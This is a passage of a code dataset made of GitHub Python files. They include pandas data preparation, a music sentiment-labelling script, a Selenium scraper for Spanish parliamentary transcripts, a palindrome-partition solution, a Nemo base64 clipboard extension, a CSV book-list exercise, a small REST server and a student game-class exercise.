pd.concat([datos, datos_lag], axis=1)\ndatos.dropna(inplace=True)\n\"\"\"\n\n#Corrijo columnas que tienen \"[\", \"]\":\ndatos.columns = [nombre.replace('[', '(').replace(']', ')') for nombre in datos.columns]\n\n#Corrijo los booleanos a 0/1:\ndatos[datos.select_dtypes(include=['bool']).columns] = datos.select_dtypes(include=['bool']).astype(int)\n\n#Guardo el archivo\ndatos.to_csv(os.path.join('Datos', 'Insumos_python', 'insumo_modelo_1.csv'), index = False)","repo_name":"matiaspoullain/Tesis-maestria","sub_path":"Scripts/Modelos/Modelo_1/estructuracion_datos.py","file_name":"estructuracion_datos.py","file_ext":"py","file_size_in_byte":2622,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"71726527217","text":"# raw data files downloaded from http://millionsongdataset.com/musixmatch/\n\nfrom typing import List\n\nimport pandas as pd\n\nfrom dao.dao_mxm_labels import DAOMxmLabels\nfrom dao.dao_sentiment_scores import DAOSentimentScores\nfrom models.mxm_label import MxmLabel\nfrom models.sentiment_score import SentimentScore\n\n\ndef read_data_from_database():\n dao_sentiment_scores: DAOSentimentScores = DAOSentimentScores()\n sentiment_scores: List[SentimentScore] = dao_sentiment_scores.find_all()\n return sentiment_scores\n\n\ndef database_data_to_dataframe():\n sentiment_scores = read_data_from_database()\n headers = sentiment_scores[0].dict().keys()\n sentiment_values = [score.dict().values() for score in sentiment_scores]\n sentiment_df = pd.DataFrame(sentiment_values, columns=headers)\n return sentiment_df\n\n\nif __name__ == '__main__':\n dao_labels: DAOMxmLabels = DAOMxmLabels()\n sentiment_df = database_data_to_dataframe()\n labels = dao_labels.find_all()\n\n for label in labels:\n sentiment_score = sentiment_df[sentiment_df['word'] == label.attr_name]\n if len(sentiment_score) > 0:\n label.sentiment_score = sentiment_score.iloc[0]['sentiment_score']\n dao_labels.update_one(query={\"attr_name\": label.attr_name},\n values={\"$set\": {\"sentiment_score\": int(label.sentiment_score)}})\n else:\n dao_labels.update_one(query={\"attr_name\": label.attr_name}, values={\"$set\": {\"sentiment_score\": 
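The pivot used above is one way to one-hot encode the holiday column; pandas.get_dummies is a more direct route to the same columns (the frame and holiday name here are illustrative, not from the dataset):

import pandas as pd

df = pd.DataFrame({"ds": pd.date_range("2020-01-01", periods=4, freq="h"),
                   "holiday": ["navidad", None, None, "navidad"]})
dummies = pd.get_dummies(df["holiday"]).astype(int)  # NaN rows become all-zero
df = pd.concat([df.drop(columns="holiday"), dummies], axis=1)
assert df["navidad"].tolist() == [1, 0, 0, 1]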
0}})\n","repo_name":"ERoszczyk/music_recommendation","sub_path":"data/0_raw/mxm/mxm_labels_add_sentiment_scores.py","file_name":"mxm_labels_add_sentiment_scores.py","file_ext":"py","file_size_in_byte":1496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"38194542151","text":"import sys\nimport os\nimport time\nimport numpy as np\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.service import Service\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\n\nsys.path.append(os.getcwd())\n\nfrom preparation.data_manager import DataManager\nfrom processing.clean import Cleaning\n\nos.environ[\"WDM_SSL_VERIFY\"] = \"0\"\n\n\nclass GobTranscripts:\n\n SLEEP = 1\n DEEP_SLEEP = 3\n WEB_PAGE = \"https://www.congreso.es/busqueda-de-intervenciones\"\n\n def __init__(self, out_dir: str, name: str):\n \"\"\"_summary_\n :param out_dir: _description_\n :type out_dir: str\n :param name: _description_\n :type name: str\n \"\"\"\n options = webdriver.ChromeOptions()\n options.add_argument(\"ignore-certificate-errors\")\n options.add_argument(\"log-level=3\")\n options.add_argument(\"--headless\")\n options.add_argument(\"--window-size=1920,1080\")\n options.add_argument(\"--start-maximized\")\n options.add_argument(\"--disable-dev-shm-usage\")\n options.add_argument(\"--no-sandbox\")\n options.add_argument(\"--disable-extensions\")\n options.add_argument(\"disable-infobars\")\n options.add_experimental_option(\n \"prefs\", {\"profile.default_content_settings.cookies\": 2}\n )\n self._driver = webdriver.Chrome(\n service=Service(ChromeDriverManager().install()), options=options\n )\n self.transcripts = {}\n self.out_dir = out_dir\n self.name = name\n\n def extract_pdf_transcripts(self):\n \"\"\"_summary_\"\"\"\n try:\n self._driver.get(GobTranscripts.WEB_PAGE)\n self._search(self.name)\n self.transcripts[self.name] = self._get_transcripts()\n while not self._check_last_page():\n self._next_page()\n self.transcripts[self.name] += self._get_transcripts()\n self._write_json()\n self._driver.close()\n self._driver.quit()\n\n except Exception:\n self._driver.close()\n self._driver.quit()\n raise\n\n def _search(self, name: str):\n \"\"\"_summary_\n :param name: _description_\n :type name: str\n \"\"\"\n try:\n input = WebDriverWait(self._driver, GobTranscripts.SLEEP).until(\n EC.presence_of_element_located((By.ID, \"_intervenciones_orador\"))\n )\n input.send_keys(name)\n WebDriverWait(self._driver, GobTranscripts.SLEEP).until(\n EC.element_to_be_clickable(\n (By.ID, \"_intervenciones_resultsShowedIntervenciones\")\n )\n ).click()\n WebDriverWait(self._driver, GobTranscripts.SLEEP).until(\n EC.element_to_be_clickable(\n (By.XPATH, \"//span[contains(text(), 'Buscar')]\")\n )\n ).click()\n time.sleep(GobTranscripts.DEEP_SLEEP)\n except Exception:\n raise\n\n def _check_last_page(self):\n \"\"\"_summary_\"\"\"\n results = (\n WebDriverWait(self._driver, GobTranscripts.SLEEP)\n .until(\n EC.presence_of_element_located(\n (By.ID, \"_intervenciones_resultsShowedIntervenciones\")\n )\n )\n .text\n )\n results = results.split(\" \")\n pages = [word for word in results if word.isnumeric()]\n pages = np.unique(pages)\n if len(pages) == 2:\n return True\n else:\n return False\n\n def _next_page(self):\n \"\"\"_summary_\"\"\"\n WebDriverWait(self._driver, 
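The scraper below leans on one explicit-wait pattern throughout (_search, _next_page, _get_transcripts). Factored out as a standalone helper for reference; the helper name and locator are illustrative:

from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By

def click_when_ready(driver, xpath, timeout=3):
    # blocks up to `timeout` seconds for the element, then clicks it;
    # raises selenium.common.exceptions.TimeoutException if it never appears
    WebDriverWait(driver, timeout).until(
        EC.element_to_be_clickable((By.XPATH, xpath))
    ).click()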
GobTranscripts.SLEEP).until(\n            EC.element_to_be_clickable((By.XPATH, \"//a[contains(text(), '>')]\"))\n        ).click()\n        time.sleep(GobTranscripts.DEEP_SLEEP)\n\n    def _get_transcripts(self):\n        \"\"\"_summary_\"\"\"\n        transcripts = WebDriverWait(self._driver, GobTranscripts.SLEEP).until(\n            EC.presence_of_all_elements_located(\n                (\n                    By.XPATH,\n                    \"//a[contains(@href,'.PDF')]\",\n                )\n            )\n        )\n        transcripts = [trans.get_attribute(\"href\") for trans in transcripts]\n        return transcripts\n\n    def _write_json(self):\n        \"\"\"_summary_\n        :param name: _description_\n        :type name: str\n        \"\"\"\n        out_file = Cleaning.create_name_file(self.name)\n        out_file = self.out_dir + out_file + \".json\"\n        DataManager.write_json(out_file, self.transcripts)\n","repo_name":"AlbertoVilla87/web-file","sub_path":"scraper/gob.py","file_name":"gob.py","file_ext":"py","file_size_in_byte":4706,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"57"}
{"seq_id":"28795434673","text":"class Solution(object):\n    def partition(self, s):\n        \"\"\"\n        :type s: str\n        :rtype: List[List[str]]\n        \"\"\"\n        if len(s) <= 1:\n            return [[s]]  # a list of partitions, each a list of strings\n        result = []\n        self.getpartition(s, 0, result, [])\n        return result\n\n    def getpartition(self, nums, pos, result, temp):\n        if pos == len(nums):\n            result.append([] + temp)\n        for index in range(pos, len(nums)):\n            if not self.Palindrome(nums[pos:index + 1]):\n                continue\n            temp.append(nums[pos:index + 1])\n            self.getpartition(nums, index + 1, result, temp)\n            temp.pop()\n\n    def Palindrome(self, nums):\n        if nums is None:\n            return None\n        if nums == nums[::-1]:\n            return True\n        else:\n            return False\n\n\nif __name__ == '__main__':\n    index = Solution().partition(\"aab\")\n    print(index)","repo_name":"xiaoqiangcs/LeetCode","sub_path":"Partition.py","file_name":"Partition.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"57"}
{"seq_id":"9536605499","text":"#!/usr/bin/env python3\n\nimport os\nimport subprocess\nimport gi\nimport pyperclip\n\n# require_version must be called before importing from gi.repository\ngi.require_version('Nemo', '3.0')\nfrom gi.repository import Nemo, GObject, Gtk, Gdk\n\nclass NemoCopyBase64(GObject.GObject, Nemo.MenuProvider):\n    def __init__(self):\n        pass\n\n    def menu_activate_cb(self, menu, file):\n        filepath = file.get_location().get_path()\n        base64_content = subprocess.check_output(['base64', '-w', '0', filepath]).decode().strip()\n\n        clipboard = Gtk.Clipboard.get(Gdk.SELECTION_CLIPBOARD)\n        clipboard.set_text(base64_content, -1)\n        clipboard.store()\n\n    def get_file_items(self, window, files):\n        if len(files) == 1 and not files[0].is_directory():\n            item = Nemo.MenuItem(name='NemoCopyBase64::CopyBase64', label='Copy Base64', tip='Copy Base64 representation of the file', icon='edit-paste')\n            item.connect('activate', self.menu_activate_cb, files[0])\n            return item,\n        return\n\nif __name__ == '__main__':\n    NemoCopyBase64.register()\n","repo_name":"elias-chacon/nemo-copy-base64","sub_path":"nemo-base64-copy.py","file_name":"nemo-base64-copy.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"}
{"seq_id":"5529439061","text":"#111. Create the following CSV data as the file book.csv\nimport csv\n\nfile=open(\"Books.csv\",\"w\")\nfile.write(\" | 제목 | 저자 | 출간연도 |\\n\")# write the column header at the top\nfor i in range(0,5):# repeat 5 times since 5 entries are needed.\n    num=(str(i))# convert to str since everything is written out as text.\n    n=input(\"enter the book name:\")\n    w=input(\"enter the writer name:\")\n    d=input(\"enter the year of published:\")\n    l1=num+\"_\"+n+\"|\"+w+\"|\"+d+\"\\n\"# build a single line\n    file.write(str(l1))# write the line in the given format.\nfile.close()\n\nfile=open(\"Books.csv\",\"r\")# open the file for reading.\nfor row in file:\n    print(row)# print one line at a time.\nfile.close()\n\n#112. Extend the program above: ask the user for extra content and append it to each row, one row per line.\nfile=list(csv.reader(open(\"Books.csv\"),delimiter=\"|\"))# parse with | as the delimiter\nbk=[]\nfor row in file:\n    bk.append(row)\nfile=open(\"Book.csv\",\"w\")\nc=1\nfor row in bk[1:]:# skip the header row\n    inp=input(\"enter another entry:\") \n    l2=bk[c][0]+\"|\"+bk[c][1]+\"|\"+bk[c][2]+\"|\"+inp+\"\\n\"\n    file.write(l2)\n    c=c+1\nfile.close()\n\n#IndexError: list index out of range -> raised when an index beyond the last element of the list is requested.\n\nfile=open(\"Book.csv\",\"r\")# open the file for reading.\nfor row in file:\n    print(row)# print one line at a time.\nfile.close()","repo_name":"opuntia88/stud_code","sub_path":"py/book_py_14_test.py","file_name":"book_py_14_test.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"57"}
{"seq_id":"10303301233","text":"from http.server import HTTPServer\r\nfrom http.server import BaseHTTPRequestHandler\r\nimport cgi, json, codecs, requests, time, threading\r\nfrom socketserver import ThreadingMixIn\r\nimport uuid\r\n\r\nbooks = json.loads(open(\"books.json\").read())\r\nauthors = json.loads(open(\"authors.json\").read())\r\nreaders = json.loads(open(\"readers.json\").read())\r\nreadersBooks = json.loads(open(\"readersBooks.json\").read())\r\n\r\ndef commitChanges():\r\n    open(\"books.json\", 'w').write(json.dumps(books))\r\n    open(\"authors.json\", 'w').write(json.dumps(authors))\r\n    open(\"readers.json\", 'w').write(json.dumps(readers))\r\n    open(\"readersBooks.json\", 'w').write(json.dumps(readersBooks))\r\n\r\ndef getAllBooks():\r\n    return books\r\n\r\ndef getAllBooksForReaderId(readerId):\r\n    if not getReaderById(readerId):\r\n        return False\r\n\r\n    result = []\r\n    for readerBook in readersBooks:\r\n        if readerId == readerBook['readerId']:\r\n            result.append(getBookById(readerBook['bookId']))\r\n    return result\r\n\r\ndef getBookForReaderId(readerId, bookId):\r\n    if not getReaderById(readerId):\r\n        return False\r\n\r\n    for readerBook in getAllBooksForReaderId(readerId):\r\n        if bookId == readerBook['id']:\r\n            return readerBook\r\n    return False\r\n\r\ndef getAllBooksForAuthorId(authorId):\r\n    if not getAuthorById(authorId):\r\n        return False\r\n\r\n    result = []\r\n    for book in books:\r\n        if authorId == book['authorId']:\r\n            result.append(book)\r\n    return result\r\n\r\ndef getBookForAuthorId(authorId, bookId):\r\n    if not getAuthorById(authorId):\r\n        return False\r\n\r\n    for book in getAllBooksForAuthorId(authorId):\r\n        if bookId == book['id']:\r\n            return book\r\n    return False\r\n\r\ndef getAllReaders():\r\n    return readers\r\n\r\ndef getReaderFromBookId(bookId):\r\n    for readerBook in readersBooks:\r\n        if readerBook['bookId'] == bookId:\r\n            return getReaderById(readerBook['readerId'])\r\n    return False\r\n\r\ndef getAuthorFromBookId(bookId):\r\n    if not getBookById(bookId):\r\n        return False\r\n\r\n    book = getBookById(bookId)\r\n    author = getAuthorById(book['authorId'])\r\n    return author\r\n\r\ndef getAllAuthors():\r\n    return authors\r\n\r\ndef getBookById(id):\r\n    for book in books:\r\n        if book['id'] == id:\r\n            return book\r\n    return False\r\n\r\ndef getAuthorById(id):\r\n    for author in authors:\r\n        if author['id'] == id:\r\n            return author\r\n    return False\r\n\r\ndef getReaderById(id):\r\n    for reader in readers:\r\n        if reader['id'] == id:\r\n            return reader\r\n    return False\r\n\r\ndef insertBook(name, authorId, 
genre):\r\n    if not getAuthorById(authorId):\r\n        return 404\r\n\r\n    book = {'id': str(uuid.uuid4()), 'name': name, 'authorId': authorId, 'genre': genre}\r\n    books.append(book)\r\n    return book\r\n\r\ndef insertReader(name):\r\n    reader = {'id': str(uuid.uuid4()), 'name': name}\r\n    readers.append(reader)\r\n    return reader\r\n\r\ndef insertAuthor(name):\r\n    author = {'id': str(uuid.uuid4()), 'name': name}\r\n    authors.append(author)\r\n    return author\r\n\r\ndef insertReaderBook(readerId, bookId):\r\n    if not getBookById(bookId):\r\n        return 404\r\n    \r\n    if not getReaderById(readerId):\r\n        return 404\r\n\r\n    if getReaderFromBookId(bookId) != False or len(getAllBooksForReaderId(readerId)) > 3:\r\n        return 409\r\n    \r\n    readerBook = {'id': str(uuid.uuid4()), 'readerId': readerId, 'bookId': bookId}\r\n    readersBooks.append(readerBook)\r\n    return readerBook\r\n\r\ndef deleteReaderById(readerId):\r\n    if not getReaderById(readerId):\r\n        return False\r\n    \r\n    for i in range(0, len(readers)):\r\n        if readers[i]['id'] == readerId:\r\n            readers.pop(i)\r\n            break\r\n    \r\n    # rebuild the list instead of popping while iterating over its indices\r\n    readersBooks[:] = [rb for rb in readersBooks if rb['readerId'] != readerId]\r\n\r\n    return True\r\n\r\ndef deleteBookById(bookId):\r\n    if not getBookById(bookId):\r\n        return False\r\n    \r\n    for i in range(0, len(books)):\r\n        if books[i]['id'] == bookId:\r\n            books.pop(i)\r\n            break\r\n    \r\n    # rebuild the list instead of popping while iterating over its indices\r\n    readersBooks[:] = [rb for rb in readersBooks if rb['bookId'] != bookId]\r\n\r\n    return True\r\n\r\ndef deleteReaderBookById(readerId, bookId):\r\n    if not getBookForReaderId(readerId, bookId):\r\n        return False\r\n\r\n    for i in range(0, len(readersBooks)):\r\n        if readersBooks[i]['bookId'] == bookId:\r\n            readersBooks.pop(i)\r\n            break  # stop once removed; the list is shorter now\r\n    return True\r\n\r\ndef deleteAuthorById(authorId):\r\n    if not getAuthorById(authorId):\r\n        return False\r\n    \r\n    # collect the author's books before removing the author,\r\n    # otherwise getAllBooksForAuthorId() returns False afterwards\r\n    authorBooks = getAllBooksForAuthorId(authorId)\r\n\r\n    for i in range(0, len(authors)):\r\n        if authors[i]['id'] == authorId:\r\n            authors.pop(i)\r\n            break\r\n\r\n    if authorBooks:\r\n        for book in authorBooks:\r\n            deleteBookById(book['id'])\r\n\r\n    return True\r\n\r\ndef updateBook(bookId, data):\r\n    if not getBookById(bookId) or not getAuthorById(data['authorId']):\r\n        return False\r\n\r\n    for i in range(0, len(books)):\r\n        if books[i]['id'] == bookId:\r\n            books[i]['name'] = data['name']\r\n            books[i]['genre'] = data['genre']\r\n            books[i]['authorId'] = data['authorId']\r\n            return books[i]\r\n\r\ndef updateAuthor(authorId, data):\r\n    if not getAuthorById(authorId):\r\n        return False\r\n    \r\n    for i in range(0, len(authors)):\r\n        if authors[i]['id'] == authorId:\r\n            authors[i]['name'] = data['name']\r\n            return authors[i]\r\n\r\ndef bulkInsertReaderBooks(readerId, bookIds):\r\n    if len(bookIds) > 3:\r\n        return False\r\n\r\n    currentReaderBooks = getAllBooksForReaderId(readerId)\r\n\r\n    for book in currentReaderBooks:\r\n        deleteReaderBookById(readerId, book['id'])\r\n\r\n    for bookId in bookIds:\r\n        insertReaderBook(readerId, bookId)\r\n    return True\r\n    \r\n\r\ndef updateReader(readerId, data):\r\n    if not getReaderById(readerId):\r\n        return False\r\n    \r\n    for i in range(0, len(readers)):\r\n        if readers[i]['id'] == readerId:\r\n            readers[i]['name'] = data['name']\r\n            if 'books' in data:\r\n                if not bulkInsertReaderBooks(readerId,data['books']):\r\n                    return 409\r\n            return readers[i]\r\n\r\ndef splitUrl(path):\r\n    if '?' 
in path:\r\n        path = path.split(\"?\")[0]\r\n    return path.split('/')[1:]\r\n\r\n\r\nclass RestHTTPRequestHandler(BaseHTTPRequestHandler):\r\n    def do_GET(self):\r\n        try:\r\n            splittedUrl = splitUrl(self.path)\r\n            response = 400\r\n\r\n            if self.headers['Content-Type'] != 'application/json':\r\n                self.send_response(415)\r\n                self.end_headers()\r\n                return\r\n\r\n            if splittedUrl[0] == 'readers':\r\n                if len(splittedUrl) == 1:\r\n                    response = getAllReaders()\r\n                    # compare against [] because helpers may return False or a dict,\r\n                    # and len() on those would raise TypeError here\r\n                    if response == []:\r\n                        response = 204\r\n                elif len(splittedUrl) == 2:\r\n                    response = getReaderById(splittedUrl[1])\r\n                elif len(splittedUrl) == 3 and splittedUrl[2] == 'books':\r\n                    response = getAllBooksForReaderId(splittedUrl[1])\r\n                    if response == []:\r\n                        response = 204\r\n                elif len(splittedUrl) == 4 and splittedUrl[2] == 'books':\r\n                    response = getBookForReaderId(splittedUrl[1], splittedUrl[3])\r\n\r\n            elif splittedUrl[0] == 'books':\r\n                if len(splittedUrl) == 1:\r\n                    response = getAllBooks()\r\n                    if response == []:\r\n                        response = 204\r\n                if len(splittedUrl) == 2:\r\n                    response = getBookById(splittedUrl[1])\r\n                if len(splittedUrl) == 3 and splittedUrl[2] == 'reader':\r\n                    response = getReaderFromBookId(splittedUrl[1])\r\n                    if response == []:\r\n                        response = 204\r\n                if len(splittedUrl) == 3 and splittedUrl[2] == 'author':\r\n                    response = getAuthorFromBookId(splittedUrl[1])\r\n\r\n            elif splittedUrl[0] == 'authors':\r\n                if len(splittedUrl) == 1:\r\n                    response = getAllAuthors()\r\n                    if response == []:\r\n                        response = 204\r\n                if len(splittedUrl) == 2:\r\n                    response = getAuthorById(splittedUrl[1])\r\n                if len(splittedUrl) == 3 and splittedUrl[2] == 'books':\r\n                    response = getAllBooksForAuthorId(splittedUrl[1])\r\n                    if response == []:\r\n                        response = 204\r\n                if len(splittedUrl) == 4 and splittedUrl[2] == 'books':\r\n                    response = getBookForAuthorId(splittedUrl[1], splittedUrl[3])\r\n\r\n            if response == 400 or response == 204:\r\n                self.send_response(response)\r\n                self.end_headers()\r\n                return\r\n            if not response:\r\n                self.send_response(404)\r\n                self.end_headers()\r\n                return\r\n            else:\r\n                self.send_response(200)\r\n                self.end_headers()\r\n                self.wfile.write(json.dumps(response).encode())\r\n                return\r\n        except:\r\n            self.send_response(500)\r\n            self.end_headers()\r\n            return\r\n\r\n    def do_POST(self):\r\n        try:\r\n            response = 400\r\n            splittedUrl = splitUrl(self.path)\r\n            data = json.loads(self.rfile.read(int(self.headers['Content-Length'])))\r\n\r\n            if self.headers['Content-Type'] != 'application/json':\r\n                self.send_response(415)\r\n                self.end_headers()\r\n                return\r\n\r\n            if splittedUrl[0] == 'readers':\r\n                if len(splittedUrl) == 1:\r\n                    if not 'name' in data:\r\n                        response = 400\r\n                    else:\r\n                        response = insertReader(data['name'])\r\n                elif len(splittedUrl) == 4 and splittedUrl[2] == 'books':\r\n                    response = insertReaderBook(splittedUrl[1], splittedUrl[3])\r\n            elif splittedUrl[0] == 'books':\r\n                if len(splittedUrl) == 1:\r\n                    if not 'name' in data or not 'authorId' in data or not 'genre' in data:\r\n                        response = 400\r\n                    else:\r\n                        response = insertBook(data['name'], data['authorId'], data['genre'])\r\n            elif splittedUrl[0] == 'authors':\r\n                if len(splittedUrl) == 1:\r\n                    if not 'name' in data:\r\n                        response = 400\r\n                    else:\r\n                        response = insertAuthor(data['name'])\r\n                if len(splittedUrl) == 3 and splittedUrl[2] == 'books':\r\n                    if not 'name' in data or not 'genre' in data:\r\n                        response = 400\r\n                    else:\r\n                        response = insertBook(data['name'], splittedUrl[1], data['genre'])\r\n\r\n            if response == 409 or response == 404 or response == 400:\r\n                
self.send_response(response)\r\n                self.end_headers()\r\n                return\r\n            else:\r\n                self.send_response(201)\r\n                self.end_headers()\r\n                self.wfile.write(json.dumps(response).encode())\r\n                commitChanges()\r\n                return\r\n        except:\r\n            self.send_response(500)\r\n            self.end_headers()\r\n            return\r\n\r\n    def do_PUT(self):\r\n        try:\r\n            response = 400\r\n            splittedUrl = splitUrl(self.path)\r\n            data = json.loads(self.rfile.read(int(self.headers['Content-Length'])))\r\n\r\n            if self.headers['Content-Type'] != 'application/json':\r\n                self.send_response(415)\r\n                self.end_headers()\r\n                return\r\n\r\n            if len(splittedUrl) == 2 and splittedUrl[0] == 'readers':\r\n                if not 'name' in data:\r\n                    response = 400\r\n                else:\r\n                    response = updateReader(splittedUrl[1], data)\r\n            elif len(splittedUrl) == 2 and splittedUrl[0] == 'books':\r\n                if not 'name' in data or not 'authorId' in data or not 'genre' in data:\r\n                    response = 400\r\n                else:\r\n                    response = updateBook(splittedUrl[1], data)\r\n            elif len(splittedUrl) == 2 and splittedUrl[0] == 'authors':\r\n                if not 'name' in data:\r\n                    response = 400\r\n                else:\r\n                    response = updateAuthor(splittedUrl[1], data)\r\n\r\n            if response == 400:\r\n                self.send_response(400)\r\n                self.end_headers()\r\n                return\r\n            if response == 409:\r\n                self.send_response(409)\r\n                self.end_headers()\r\n                return\r\n            if not response:\r\n                self.send_response(404)\r\n                self.end_headers()\r\n                return\r\n            else:\r\n                self.send_response(200)\r\n                self.end_headers()\r\n                self.wfile.write(json.dumps(response).encode())\r\n                commitChanges()\r\n                return\r\n        except:\r\n            self.send_response(500)\r\n            self.end_headers()\r\n            return\r\n\r\n    def do_DELETE(self):\r\n        try:\r\n            response = 400\r\n            splittedUrl = splitUrl(self.path)\r\n\r\n            if self.headers['Content-Type'] != 'application/json':\r\n                self.send_response(415)\r\n                self.end_headers()\r\n                return\r\n\r\n            if len(splittedUrl) == 2 and splittedUrl[0] == 'readers':\r\n                response = deleteReaderById(splittedUrl[1])\r\n            elif len(splittedUrl) == 2 and splittedUrl[0] == 'books':\r\n                response = deleteBookById(splittedUrl[1])\r\n            elif len(splittedUrl) == 4 and splittedUrl[0] == 'readers' and splittedUrl[2] == 'books':\r\n                response = deleteReaderBookById(splittedUrl[1], splittedUrl[3])\r\n            elif len(splittedUrl) == 2 and splittedUrl[0] == 'authors':\r\n                response = deleteAuthorById(splittedUrl[1])\r\n            \r\n            if response == 400:\r\n                self.send_response(400)\r\n                self.end_headers()\r\n                return\r\n            if not response:\r\n                self.send_response(404)\r\n                self.end_headers()\r\n                return\r\n            else:\r\n                self.send_response(204)\r\n                self.end_headers()\r\n                commitChanges()\r\n                return\r\n        except:\r\n            self.send_response(500)\r\n            self.end_headers()\r\n            return\r\n\r\n\r\n\r\nclass ThreadedHTTPServer(ThreadingMixIn, HTTPServer):\r\n    pass\r\n\r\nhttpd = ThreadedHTTPServer(('0.0.0.0', 8000), RestHTTPRequestHandler)\r\nhttpd.serve_forever()","repo_name":"GabrielS5/CloudComputing","sub_path":"Tema2/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":15094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"}
{"seq_id":"37889251364","text":"import random\r\nclass Warrior:\r\n    def __init__(self, health, stamina):\r\n        self.__health = health\r\n        self.__stamina = stamina\r\n\r\n    @property\r\n    def health(self):\r\n        return self.__health\r\n\r\n    @health.setter\r\n    def health(self, new_health):\r\n        if new_health > 100: # check the \"new\" health value, not the \"old\" one\r\n            self.__health = 100\r\n        elif new_health < 0:\r\n            self.__health = 0\r\n        else:\r\n            self.__health = new_health\r\n\r\n\r\n    @property\r\n    def stamina(self):\r\n        return self.__stamina\r\n\r\n\r\n    @stamina.setter\r\n    def stamina(self, new_stamina):\r\n        self.__stamina = new_stamina\r\n\r\n    def introduces(self):\r\n        print(\"-----------\")\r\n        print(f'Class: {self.__class__.__name__}',\r\n              f'\\nHealth: {self.__health}',\r\n              f'\\nStamina: {self.__stamina}')\r\n        print('-----------')\r\n\r\n\r\n    def heal(self, target):\r\n        if self.__stamina >=20:\r\n            print('-----------')\r\n            print(f'{self.__class__.__name__} bandage with herbs on '\r\n                  f'{target.__class__.__name__}')\r\n            target.health += 10  # use the health property instead of a missing _set_health()\r\n            self.__stamina -= 20\r\n            print(f'Health of {target.__class__.__name__} upgraded to {target.health}',\r\n                  f'\\nNow {self.__class__.__name__} have only {self.__stamina} stamina')\r\n            print('------------')\r\n        else:\r\n            print(\"Not enough stamina for this action\")\r\n\r\n\r\n    def attacks(self, target):\r\n        if target.health >= 3:\r\n            print('-----------')\r\n            print(f'{self.__class__.__name__} attack {target.__class__.__name__} with sword ')\r\n            target.health -= 3\r\n            print(f'Health of {target.__class__.__name__} lowered to {target.health}')\r\n            print('------------')\r\n        else:\r\n            print(self.__class__.__name__, \"makes final punch and kills\", target.__class__.__name__)\r\n\r\n\r\nclass Mage:\r\n    def __init__(self, health, mana): # no need for __ in the parameters\r\n        self.health = health # plain health and mana here\r\n        self.mana = mana\r\n\r\n    @property\r\n    def health(self):\r\n        return self.__health # but __health here\r\n\r\n    @health.setter\r\n    def health(self, new_health):\r\n        if new_health > 60: # here we also check new_health\r\n            self.__health = 60\r\n        elif new_health < 0: # elif, otherwise the else branch would undo the cap\r\n            self.__health = 0\r\n        else:\r\n            self.__health = new_health\r\n\r\n\r\n    def introducesMage(self):\r\n        print(\"-----------\")\r\n        print(f'Class: {self.__class__.__name__}',\r\n              f'\\nHealth: {self.health}',\r\n              f'\\nmana: {self.mana}')\r\n        print('-----------')\r\n\r\n    def heal(self, target):\r\n        if self.mana >= 20:\r\n            print('-----------')\r\n            print(f'{self.__class__.__name__} casts a heal spell on '\r\n                  f'{target.__class__.__name__}')\r\n            target.health += 10\r\n            self.mana -= 20\r\n            print(f'Health of {target.__class__.__name__} upgraded to {target.health}',\r\n                  f'\\nNow {self.__class__.__name__} have only {self.mana} mana')\r\n            print('------------')\r\n        else:\r\n            print(\"Not enough mana for this action\")\r\n\r\n    def attacks(self, target):\r\n        if target.health >= 3:\r\n            print('-----------')\r\n            print(f'{self.__class__.__name__} attack {target.__class__.__name__} with magic ')\r\n            target.health -= 3\r\n            print(f'Health of {target.__class__.__name__} lowered to {target.health}')\r\n            print('------------')\r\n        else:\r\n            print(self.__class__.__name__, \"makes final punch and kills\", target.__class__.__name__)\r\n\r\n\r\nclass Knight(Warrior):\r\n    def __init__(self, health=100, armor=100, stamina=100, arrows=20): # we don't use __ here\r\n        super().__init__(health, stamina) # it makes sense to call the parent constructor here to avoid repeating code\r\n        self.__armor = armor\r\n        self.__arrows = arrows\r\n\r\n    # If you want to create new attributes,\r\n    # define them in the constructor first!\r\n\r\n    #def _get_armor(self):\r\n    #    return self.armor\r\n\r\n\r\n    #def _get_barrier(self):\r\n    #    return self.barrier\r\n\r\n\r\n    # The setter and getter already exist in the parent class\r\n    #def _get_health(self):\r\n    #    return self.__health\r\n\r\n    #def _set_health(self, points):\r\n    #    if self.armor <= points:\r\n    #        print(self.__class__.__name__)\r\n    #    elif self.armor > 0:\r\n    #        if points <= 0:\r\n    #            self.armor += points\r\n    #        else:\r\n    #            self.__health += points\r\n\r\n    #    if self.__health > 60:\r\n    #        self.__health = 60\r\n    #    if self.__health < 0:\r\n    #        self.__health = 0\r\n\r\n    # This method also exists in the parent\r\n    #def heal(self, target):\r\n    #    if self.__stamina >= 20:\r\n    #        print('-----------')\r\n    #        print(f'{self.__class__.__name__} bandage with herbs on '\r\n    #              f'{target.__class__.__name__}')\r\n    #        target._set_health(10)\r\n    #        self.__stamina -= 20\r\n    #        print(f'Health of {target.__class__.__name__} upgraded to {target._get_health()}',\r\n    #              f'\\nNow {self.__class__.__name__} have only {self.__stamina} stamina')\r\n    #        print('------------')\r\n    #    else:\r\n    #        print(\"Not enough stamina for this action\")\r\n\r\n\r\n    # And this part here is very good!\r\n    def attacks(self, target):\r\n        chance = random.randint(1, 100)\r\n        if chance <= 40:\r\n            print('-----------')\r\n            print(f'{self.__class__.__name__} attack {target.__class__.__name__} with sword and makes critical hit ')\r\n            target.health -= 10  # go through the property; target.__health would be name-mangled\r\n            if target.__class__.__name__ == 'Wizard':\r\n                print(f'Health of {target.__class__.__name__} lowered to {target.health}')\r\n            print(f'Health of {target.__class__.__name__} lowered to {target.health}')\r\n           